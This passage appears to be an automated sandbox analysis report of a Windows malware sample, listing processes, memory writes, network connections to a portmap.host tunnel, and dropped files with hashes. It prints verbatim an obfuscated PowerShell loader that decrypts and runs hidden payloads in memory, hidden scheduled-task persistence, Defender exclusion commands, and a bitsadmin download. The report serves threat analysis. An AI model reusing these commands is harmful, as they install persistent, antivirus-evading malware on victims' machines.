PID 1548 wrote to memory of 2280 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1548 wrote to memory of 1488 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1548 wrote to memory of 3456 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 2856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1548 wrote to memory of 2656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 2064 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1548 wrote to memory of 2720 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 3432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 1064 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1548 wrote to memory of 1000 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 1588 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 4012 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 1244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 1440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 4392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 1236 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1548 wrote to memory of 2612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 944 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 2804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 832 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 1224 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 2600 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 2792 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 1408 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 2784 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1548 wrote to memory of 1596 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1548 wrote to memory of 1868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1548 wrote to memory of 788 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 4736 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 3548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 4764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe
PID 1548 wrote to memory of 4764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe
PID 1548 wrote to memory of 1056 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\mshta.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k RPCSS -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\StandShooter.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNg4KoCSielf7qjlYXqAO7JKxI943sat8z2fd+W+bvE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pCU0X49GzoVy33W1yhXDAg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bRFqs=New-Object System.IO.MemoryStream(,$param_var); $HEgAc=New-Object System.IO.MemoryStream; $MSyPu=New-Object System.IO.Compression.GZipStream($bRFqs, [IO.Compression.CompressionMode]::Decompress); $MSyPu.CopyTo($HEgAc); $MSyPu.Dispose(); $bRFqs.Dispose(); $HEgAc.Dispose(); $HEgAc.ToArray();}function execute_function($param_var,$param2_var){ $DDEgm=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $fglmO=$DDEgm.EntryPoint; $fglmO.Invoke($null, $param2_var);}$fVuCm = 'C:\Users\Admin\AppData\Local\Temp\StandShooter.bat';$host.UI.RawUI.WindowTitle = $fVuCm;$EZbPl=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($fVuCm).Split([Environment]::NewLine);foreach ($MKKIe in $EZbPl) { if ($MKKIe.StartsWith('ZLMHHVVTjNWeBRfMcCXh')) { $saOcJ=$MKKIe.Substring(20); break; }}$payloads_var=[string[]]$saOcJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_313_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_313.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_313.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_313.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNg4KoCSielf7qjlYXqAO7JKxI943sat8z2fd+W+bvE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pCU0X49GzoVy33W1yhXDAg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bRFqs=New-Object System.IO.MemoryStream(,$param_var); $HEgAc=New-Object System.IO.MemoryStream; $MSyPu=New-Object System.IO.Compression.GZipStream($bRFqs, [IO.Compression.CompressionMode]::Decompress); $MSyPu.CopyTo($HEgAc); $MSyPu.Dispose(); $bRFqs.Dispose(); $HEgAc.Dispose(); $HEgAc.ToArray();}function execute_function($param_var,$param2_var){ $DDEgm=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $fglmO=$DDEgm.EntryPoint; $fglmO.Invoke($null, $param2_var);}$fVuCm = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_313.bat';$host.UI.RawUI.WindowTitle = $fVuCm;$EZbPl=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($fVuCm).Split([Environment]::NewLine);foreach ($MKKIe in $EZbPl) { if ($MKKIe.StartsWith('ZLMHHVVTjNWeBRfMcCXh')) { $saOcJ=$MKKIe.Substring(20); break; }}$payloads_var=[string[]]$saOcJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe

"C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\bitsadmin.exe

"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.Launchpad.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Stand.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Stand" /tr "C:\Users\Admin\AppData\Local\Temp\Stand.exe"

C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe

"C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe"

C:\Users\Admin\AppData\Local\Temp\Stand.exe

C:\Users\Admin\AppData\Local\Temp\Stand.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
DE 193.161.193.99:57023 Name1442-57023.portmap.host tcp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 104.21.48.235:443 stand.gg tcp
US 104.21.48.235:443 stand.gg tcp
DE 193.161.193.99:57023 Name1442-57023.portmap.host tcp
DE 193.161.193.99:57023 Name1442-57023.portmap.host tcp
DE 193.161.193.99:57023 Name1442-57023.portmap.host tcp
N/A 127.0.0.1:57023 tcp
N/A 127.0.0.1:57023 tcp
DE 193.161.193.99:57023 Name1442-57023.portmap.host tcp
DE 193.161.193.99:57023 Name1442-57023.portmap.host tcp
N/A 127.0.0.1:57023 tcp
N/A 52.111.227.13:443 tcp

Files

memory/1044-0-0x00007FFA49283000-0x00007FFA49285000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l4t1wwrk.52b.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1044-9-0x000001F1A7500000-0x000001F1A7522000-memory.dmp

memory/1044-10-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp

memory/1044-11-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp

memory/1044-12-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp

memory/1044-13-0x000001F1A7930000-0x000001F1A7976000-memory.dmp

memory/1044-14-0x000001F1A74F0000-0x000001F1A74F8000-memory.dmp

memory/1044-15-0x000001F1A7980000-0x000001F1A79E2000-memory.dmp

memory/876-25-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp

memory/876-26-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp

memory/876-27-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp

memory/876-30-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 df472dcddb36aa24247f8c8d8a517bd7
SHA1 6f54967355e507294cbc86662a6fbeedac9d7030
SHA256 e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA512 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

C:\Users\Admin\AppData\Roaming\$phantom-startup_str_313.vbs

MD5 9060b4ba1e8991f1d0aa5cd0eb4c2356
SHA1 c96bed4a46a6afcd90a2488a4462c2543264a4ee
SHA256 6e41be19c1bd85535fa7b9e7bff0bfd06018b52dceb93e301618171c07c46fd3
SHA512 b45f369c9d2c4286ccc48b37d17d7ad7624402bb706ccf53a02da7540b2dca869fbeff5b8cb8a9389bc26280753ba21494ea53ee124600792d019df184068716

C:\Users\Admin\AppData\Roaming\$phantom-startup_str_313.bat

MD5 537886f4e49111f326e5d90e4c38c7d1
SHA1 57b09c800cba244e68d317a0960f041aee468360
SHA256 dc4ad7f04bd7f277494092d4db0c337b1b4bbe5d0bc8a667babf5f3045144416
SHA512 0deb228bf17e218fdf7f98f49f89c1f25ee059c95887a697afbe64acbf3411f022eb80ee5349e8e44658511609e0c585aa501cb645439bc97088ba169f7c8107

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 3ec0d76d886b2f4b9f1e3da7ce9e2cd7
SHA1 68a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea
SHA256 214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5
SHA512 a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6

memory/1044-47-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp

memory/3276-48-0x0000000002FD0000-0x0000000002FFA000-memory.dmp

memory/2236-99-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

memory/2612-101-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

memory/1440-104-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

memory/1236-111-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

memory/2552-106-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

memory/832-105-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

memory/2656-110-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

memory/2064-109-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

memory/1488-108-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

memory/1120-107-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

memory/1760-102-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

memory/2280-100-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

memory/3456-103-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

memory/1300-98-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

memory/1320-97-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

memory/1676-96-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

memory/3276-95-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

memory/1548-142-0x0000021CBA390000-0x0000021CBA3CC000-memory.dmp

C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe

MD5 2da779eff5b744fb55630f1fea103c69
SHA1 27451e6cf9c69908e8ee6a4b373a31a14a83807e
SHA256 6892baef0e4f6221b3cf66d16effaa88c79e985e41daf9f125b83489bb49c4bd
SHA512 63b6e232d03455bc6c9aff13dcf4eaf0c7e2b423bb3e00c32a06a23f623f80ffbfb43e08827494948825ece10fd59e52ac91ded6e206197f97431a36eb9f22d5

memory/4764-155-0x0000000000130000-0x0000000000150000-memory.dmp

C:\Users\Admin\AppData\Roaming\Downloader.hta

MD5 4ec749a8c1d7d0a4be501465d297d3dc
SHA1 d7727cb4dc96d653bce6c6bbe70ff171ecc197b7
SHA256 7bd2ea1be121e862cc93c8c41429d0f9d1d3b57478e586bbeed7d3d3be3a96f6
SHA512 38d4ca973a3da55453dd37cb8965db223d42b03493b8d5390ab58cc3b53df1405119663f91bcef2ce2efc082ea17b0021c407eb65c6076d127408f2ff2c7d44e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f65feb0fbbd0fcb9da91d117a38e4f31
SHA1 95b1256dd050df6d555a4d06d4dc7ac542b6a070
SHA256 cb0bff45abfcccadc000e77840ccf5004ae4197a8d98baab877e6e9c238bba0c
SHA512 0715ba19e75a60eeb6cf98f4bc80980f1f1e681bd69d3ce242bf1c50787b82eb99064de0c0753c4259dcc8837a65ac2b7c84b3c1f114200cb252c05e448b1776

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d0a4a3b9a52b8fe3b019f6cd0ef3dad6
SHA1 fed70ce7834c3b97edbd078eccda1e5effa527cd
SHA256 21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31
SHA512 1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f8c40f7624e23fa92ae2f41e34cfca77
SHA1 20e742cfe2759ac2adbc16db736a9e143ca7b677
SHA256 c51a52818a084addbfa913d2bb4bb2b0e60c287a4cf98e679f18b8a521c0aa7b
SHA512 f1da3ec61403d788d417d097a7ed2947203c6bff3cf1d35d697c31edecdf04710b3e44b2aa263b886e297b2ce923fea410ccc673261928f1d0cd81252740dbe7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4ae54c3a00d1d664f74bfd4f70c85332
SHA1 67f3ed7aaea35153326c1f907c0334feef08484c
SHA256 1e56a98f74d4a604bef716b47ef730d88f93aec57a98c89aa4423394cbc95b5c
SHA512 b3bbdefeaadbdaac00f23ce3389bbd3b565bd7e0079aeebf3e4afba892382e1cd3896c00bb2e5a98146ac593f9bdc5568d0bd08c5b0139f0814b1a38911c3889

memory/1864-207-0x0000025451240000-0x0000025451256000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

MD5 2706338be57957c36e522aea195dfb67
SHA1 5edb5ce823cee667af3f22504011a43586ed7e47
SHA256 dc0bcdee529306672127ab14f0221e47c036401da351396f39aaa9adb1c0ba45
SHA512 4b3ca6a9d8632e176560dfbe77a3b6988a1af4783d5df8773438f133136a486d49a90bf496c79abd4f60460edaa37236736ec464dcbc408883d6113eefd34dc3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 58c16aef4a0ab99e4b21c755de99f3d1
SHA1 033f9aa1f6738163c8ad2698e6461c29bb1892e1
SHA256 20948b155843e982cc1d8f1d287b06f763f14ce27f368acef42c27a9e24f6726
SHA512 139acd86950a128920b5d94260ec7c95701407aaf3a5e11ba6a6dcceaf40d51bc44a7a84aa6f71ba6750de3d38f1bdd5bac0180a7872b1ce3886d59dcf401b5c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E943B0FFA8084B6B254AAF787773AA42_D4E29B2355F9CFB2431676E87E1A6DFC

MD5 892dd0e625446f2923a7159c9de8850f
SHA1 e2aa449b8ae290a7c7c64579a225bf701cce39f6
SHA256 79529b6a5d751f8687a06d5ccc072f395f5bb1675814a47f1aea005ab5fae1ed
SHA512 975c35fde4b04599317a08f2ec9af18ffa2bc75d28101128816d1d114e272b3bcb88a2784c923b9f9cc1d44d0fbcc777d2859c6afc48b709ff3c60151f0025df

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A37B8BA80004D3266CB4D93B2052DC10_A93CE4618EE38C3485BA7B27239D573A

MD5 c964f98c7b2c2658f0598b7a4aae075b
SHA1 3150fab0d158dc83dbaced24786cd81ad2a0b5f9
SHA256 abee47e1e1721345a0c5e33e53370f1614c404a6b71506cad4d31579d0efb0db
SHA512 a53231618c8f8bd23d0401ae5f08883de6da6411e4ccc1fabc43dd755eb4fd7ef9044b2c861a635424eb672a0bbec47f932e6019bdee1b7b2f1c63720955244e